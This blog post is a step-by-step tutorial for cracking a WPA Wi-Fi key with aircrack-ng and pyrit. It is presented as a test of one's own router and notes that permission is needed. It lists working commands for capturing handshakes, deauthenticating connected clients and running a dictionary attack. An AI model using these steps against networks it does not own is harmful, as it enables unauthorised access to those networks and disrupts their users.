Saturday, 2 July 2011

Cracking WPA using pyrit and aircrack

Hi all,

This is the follow on post to the pyrit set-up.
Once its been set-up you are able to test the strength of your WPA encrypted router.

There are a few important points to note when cracking WPA.
Firstly it has to be your own router or you must have permission from the administrator.
Secondly the key that your cracking has to be inside the list or dictionary file.
If the password isn't in the dictionary file, the key will not be cracked.
Note that 'insecurepass' is different to 'Insecsurepass'.
Finally their access point has to have a client connected because during the process of capturing a handshake, the client is de-authenticated allowing the handshake to be recaptured.

The method behind WPA cracking is different to that of WEP. WEP is cracked by repetition of the IV packets. WPA is cracked by firstly capturing the handshake, where the client connects to the AP, then brute forced using a dictionary or word list.

The commands:
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 11 -w output --bssid mon0
aireplay --deauth 0 -a bssid -c client mon0

Ctrl + C to cancel the deauth and capture

pyrit eval 
pyrit -i pass.lst import_passwords
pyrit -e j2neonAP create_essid
pyrit eval
pyrit batch
pyrit verify
pyrit -o wpadb export_hashdb

aircrack -r wpadb output01.cap
Commands will differ for each WPA crack and access point. Firstly the -c is the channel of the AP, mines on 11. -w is simply the name of the text file and each bssid is different.
In the pyrit section pass.lst is a simple list that I created for the purpose of this vid and contains a few keys. This should be replaced with a decent word list or password list.
j2neonAP is my essid and again this is different for each, this is also used as a salt during the batch process.

Videos: link:
Cracking WPA using pyrit and aircrack

YouTube link:
Cracking WPA using pyrit and aircrack YouTube

Sorry again, for the square mouse camtasia, VB and BT5 don't play together nicely.


1 comment:

  1. Great! I am Using Vmware Player and I have "HD Radeon 6770" On Host So can i Install pyrit?

    Any Help will be Appreciated Thanks.